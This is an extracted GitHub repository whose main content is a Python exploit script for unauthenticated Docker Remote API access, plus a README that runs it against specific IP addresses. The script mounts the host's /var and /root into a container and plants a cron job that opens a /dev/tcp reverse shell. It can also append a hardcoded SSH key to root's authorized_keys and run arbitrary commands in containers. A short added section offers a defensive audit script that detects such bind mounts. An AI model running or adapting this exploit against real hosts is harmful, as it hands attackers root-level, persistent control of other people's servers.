Full Code of Tycx2ry/docker_api_vul for AI

Repository: Tycx2ry/docker_api_vul
Branch: master
Commit: 77d5ce794218
Files: 3
Total size: 8.3 KB

Directory structure:
gitextract_napcga5_/

├── README.md
├── dockerRemoteApiGetRootShell.py
└── requirements.txt

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# docker_api_vul
Exploit script for the Docker unauthorized access vulnerability

## Install libraries

    pip install -r requirements.txt

## List running containers

    python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375

## List all containers

    python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -a

## List all images

    python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -l

## List port mappings

    python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -L

## Write a scheduled task (CentOS, Red Hat, etc.; add the -u flag for Ubuntu and similar)

    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i <image-name> -H <reverse-ip> -P <reverse-port>
    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -u -i <image-name> -H <reverse-ip> -P <reverse-port>

## Write an SSH key (edit the public key in the script yourself)

    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i <image-name> -k

## Execute a command in a container

    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -e "id" -I <container-id>

## Delete a container

    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -c -I <container-id>

## Change the client API version

    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -v 1.22

## Show the server API version

    python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -V
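
For defenders, an added example that is not part of this repository: the script's container-creation step bind-mounts the host's `/var` and `/root` read-write, and that leaves a trace in the `HostConfig.Binds` field of `docker inspect` output. The Python 3 code below flags writable binds that reach such host locations; the `TARGETS` list, the function names and the sample JSON are assumptions constructed for this example.

```python
import json
import posixpath

# Host locations where write access from a container means control of the host.
# This list is an assumption of the example; adjust it to your environment.
TARGETS = ("/root", "/etc", "/var/spool/cron", "/run/docker.sock", "/var/run/docker.sock")

def parse_bind(bind):
    """Split a HostConfig.Binds entry 'src:dst[:opts]' into (src, dst, writable)."""
    parts = bind.split(":")
    src = parts[0]
    dst = parts[1] if len(parts) > 1 else ""
    opts = parts[2].split(",") if len(parts) > 2 else []
    return src, dst, "ro" not in opts

def exposes_target(src):
    """Return the first target that src equals, contains, or lies inside, else None."""
    src = posixpath.normpath(src)
    prefix = src.rstrip("/") + "/"
    for target in TARGETS:
        if src == target or target.startswith(prefix) or src.startswith(target + "/"):
            return target
    return None

def audit(inspect_json):
    """Return (container name, bind, target) for each writable bind that exposes a target."""
    findings = []
    for c in json.loads(inspect_json):
        binds = (c.get("HostConfig") or {}).get("Binds") or []  # Binds may be null
        for bind in binds:
            src, _dst, writable = parse_bind(bind)
            if not src.startswith("/"):  # named volume, not a host path
                continue
            target = exposes_target(src)
            if writable and target:
                findings.append((c.get("Name", "?"), bind, target))
    return findings

# Constructed sample in the shape of `docker inspect` output (not real data).
SAMPLE = json.dumps([
    {"Name": "/suspicious", "HostConfig": {"Binds": ["/var:/tmp:rw", "/root:/tmp1:rw"]}},
    {"Name": "/app", "HostConfig": {"Binds": ["/srv/app/data:/data",
        "/etc/localtime:/etc/localtime:ro", "pgdata:/var/lib/postgresql/data"]}},
    {"Name": "/idle", "HostConfig": {"Binds": None}},
])

if __name__ == "__main__":
    for name, bind, target in audit(SAMPLE):
        print(f"{name}: writable bind {bind!r} exposes {target}")
```

Feed it the JSON array printed by `docker inspect` for the containers on a host; a parent directory such as `/var` is flagged because it contains `/var/spool/cron`, while an unrelated data directory is not.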



================================================
FILE: dockerRemoteApiGetRootShell.py
================================================
#-*- coding:utf-8 -*-
#author:L.N.@insight-labs.org


import urllib2
import urllib
import json
import sys
import getopt
from docker import Client

def http_get(url):
    response = urllib2.urlopen(url)
    return response.read()

def http_post(url, values):
    jdata = values
    #print url
    #print jdata
    send_headers = {
        'Content-Type':'application/json'
    }
    req = urllib2.Request(url, data=jdata,headers=send_headers)
    response = urllib2.urlopen(req)
    return response.read()

def isset(v):
    try :
        type(eval(v))
    except:
        return 0
    else:
        return 1

def printport(portsList, name):
    if isset("portsList['IP']") == 0:
        portsList['IP']="*"
        printport(portsList,name)
    elif isset("portsList['Type']") == 0:
        portsList['Type']="*"
        printport(portsList,name)
    elif isset("portsList['PublicPort']") == 0:
        portsList['PublicPort']="*"
        printport(portsList,name)
    elif isset("portsList['PrivatePort']") == 0:
        portsList['PrivatePort']="*"
        printport(portsList,name)
    else:
        print "[-]"+name+"[+]"+portsList['Type']+"[-]"+portsList['IP']+":"+str(portsList['PrivatePort'])+" --> "+host+":"+str(portsList['PublicPort'])

def createClient(host,port,version):
    clientApiVersion = getversion(host,port,version)
    print "[-]ClientApiVersion:"+clientApiVersion
    cli = Client(base_url='tcp://'+host+':'+port,version=clientApiVersion)
    return cli

def getversion(host,port,version):
    url = "http://"+host+":"+port+"/version"
    ret = json.loads(http_get(url))
    if version != '':
        clientApiVersion = version
    else:
        clientApiVersion = ret['ApiVersion']
    return clientApiVersion

def printContainer(host,port,version,allContainer):
    cli = createClient(host,port,version)
    if allContainer == 1:
        ret = cli.containers(all=True)
    else:
        ret = cli.containers()
    for info in ret:
        print "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
        print "[-] id: "+info['Id']
        print "[-] Names: "+info['Names'][0]
        print "[-] Image: "+info['Image']
        print "[-] Status: "+info['Status']
    print "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"

if __name__ == "__main__":
    opts, args = getopt.getopt(sys.argv[1:], "v:kauVCcsLli:e:h:p:H:P:I:")
    key = 0
    version =''
    payload =''
    sshkey = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCoecC7vmWn4s2y4T+Pc3bJ0owDYWzGIBTCWWonN4qMTCbe66hKopgtUuHC1y5H3HFQ0qsni0vFAGSoO4TLiIpvHUXbf9Wi9vR2q4oYphH9Kgsd3cVXsHUFcgybwdk5DCXpmoSJTlEoOrtWajYdyuALMy+CqpkwWDj+uTz+9/2P3T0Nh5F+U+UZOgSqIi5xQfUGJKGoFGXwvpqEL6UnGG4bbgGxVa5mJZVH0cxwKK6w7luezkcRVBEJ1SZAkjZOmZojyJbYQolItcBNBsXQ+cakjg3DeU69wrDiBdP+k2i2k3uzhJqJXfxLdxUZfjgXHwSOzDb2D5+841trASAwZAy1Gq4uwkbmwupe/qTPK2R31d5h4Jqx4N19eUjT8GkkDj+mnJTwYyOPJH/ghEvn4UfNOtohM2lZPbskvvskn82g0WzYJ5JnQaKfup1IYLTraBbJ5UdVYsCfG5ddRZF4xMab2ZDgcdqyISJxHPK9/P7w7mmgSut1nK5R1+HLSl/xDAPcoVd0H3ePqxN9ZD0BoMjY8fPxKAQR+bB5M05iDIIwUxhj2NQvCpwxxGwJXUSf13zirXRZhkZGnWrkNrzqHzpLZqoEBCEORErmFAvsI8yIBvThSylReiwhAWkdL7ONQ4dd7UgsQfY/0MMfxd8/V+041I1sIVUVBnHYUUwqE0eZ9Q== wanniba@wanniba.com'
    for op, value in opts:
        if op =="-l":
            imagesList = 1
        elif op == "-i":
            imageName = value
        elif op == "-e":
            dataExec = value
        elif op == "-h":
            host = value
        elif op =='-p':
            port = value
        elif op == '-L':
            portList = 1
        elif op == '-H':
            lhsot = value
        elif op == '-P':
            lport = value
        elif op =='-C':
            createContainer = 1
        elif op == '-v':
            version = value
        elif op == '-V':
            version = 1
        elif op == '-c':
            closeContainer = 1
        elif op == '-I':
            imageId = value
        elif op == '-a':
            allContainer = 1
        elif op == '-s':
            startContainer = 1
        elif op == '-k':
            key = 1
        elif op == '-u':
            isUbuntu = 1
            
    if isset('lhsot') and isset('lport'):
        if isset('isUbuntu'):
            payload = '/bin/bash -c "echo \\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\" >> /tmp/spool/cron/crontabs/root"' #chmod 600
        else:
            payload = '/bin/bash -c "echo \\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\" >> /tmp/spool/cron/root"'  #centos,redhat and so on
        print "[-]Payload: "+payload
    if sshkey !='' and key == 1:
        payload = '/bin/bash -c "echo \\\"'+sshkey+'\\\" >> /tmp1/.ssh/authorized_keys"'
        print "[-]Payload: "+payload
    if isset('host') and isset('port'):
        if isset('version') and version == 1:
            url = "http://"+host+":"+port+"/version"
            ret = json.loads(http_get(url))
            print "[-] ApiVersion: "+ret['ApiVersion']
        elif isset('imagesList'):
            url = "http://"+host+":"+port+"/images/json"
            ret = json.loads(http_get(url))
            for info in ret:
                print "RepoTags: "+info['RepoTags'][0]
        elif isset('createContainer') and isset('imageName'):
            cli = createClient(host,port,version)
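            # The host's /var and /root are bind-mounted read-write at /tmp and /tmp1 in the
            # new container, so the payload paths under /tmp and /tmp1 refer to host files.
            container = cli.create_container(image=imageName, command='/bin/bash', tty=True, volumes=['/tmp','/tmp1'], host_config=cli.create_host_config(binds=['/var:/tmp:rw','/root:/tmp1:rw']))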
            print "[-]Container ID:"+container['Id']
            print "[-]Warning:"+str(container['Warnings'])
            response = cli.start(container=container.get('Id'))
            if isset('isUbuntu'):
                cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))
                print "[-]create crontabs ......"
                cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd='chmod 600 /tmp/spool/cron/crontabs/root'))
                print "[-]chmod 600 ......"
            else:
                print cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))
                print "[-]create crontabs ......"
        elif isset('closeContainer') and isset('imageId'):
            cli = createClient(host,port,version)
            cli.stop(container=imageId)
            cli.remove_container(container=imageId)
        elif isset('startContainer') and isset('imageId'):
            cli = createClient(host,port,version)
            cli.start(container=imageId)
        elif isset('dataExec') and isset('imageId'):
            cli = createClient(host,port,version)
            print "[-]Command:"+dataExec
            print cli.exec_start(exec_id=cli.exec_create(container=imageId, cmd=dataExec))
        elif isset('portList'):
            url = "http://"+host+":"+port+"/containers/json"
            ret = json.loads(http_get(url))
            for pl in ret:
                if isset("pl['Names'][0]"):
                    name = pl['Names'][0]
                else:
                    name = '*'
                for portsList in pl['Ports']:
                    printport(portsList, name)
        else:
            if isset('allContainer'):
                printContainer(host,port,version,allContainer)
            else:
                printContainer(host,port,version,0)


================================================
FILE: requirements.txt
================================================
docker-py == 1.8.1
SYMBOL INDEX (7 symbols across 1 files)

FILE: dockerRemoteApiGetRootShell.py
  function http_get (line 12) | def http_get(url):
  function http_post (line 16) | def http_post(url, values):
  function isset (line 27) | def isset(v):
  function printport (line 35) | def printport(portsList, name):
  function createClient (line 51) | def createClient(host,port,version):
  function getversion (line 57) | def getversion(host,port,version):
  function printContainer (line 66) | def printContainer(host,port,version,allContainer):

About this extraction

This page contains the full source code of the Tycx2ry/docker_api_vul GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 3 files (8.3 KB), approximately 2.8k tokens, and a symbol index with 7 extracted functions, classes, methods, constants, and types.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.
